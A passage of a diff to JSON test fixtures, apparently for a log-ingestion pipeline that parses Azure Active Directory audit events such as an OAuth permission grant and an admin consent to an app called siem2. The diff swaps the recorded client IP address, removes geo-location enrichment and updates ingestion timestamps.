Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -19128,25 +17472,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -19160,7 +17486,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -19296,7 +17622,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -19308,12 +17634,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036576200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":
\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft 
Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125374Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;0000
0003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1
.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft 
Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -19339,25 +17665,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -19371,7 +17679,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -19510,7 +17818,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -19522,12 +17830,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036580200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags
\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[]
 =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125380300Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"M
ozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; 
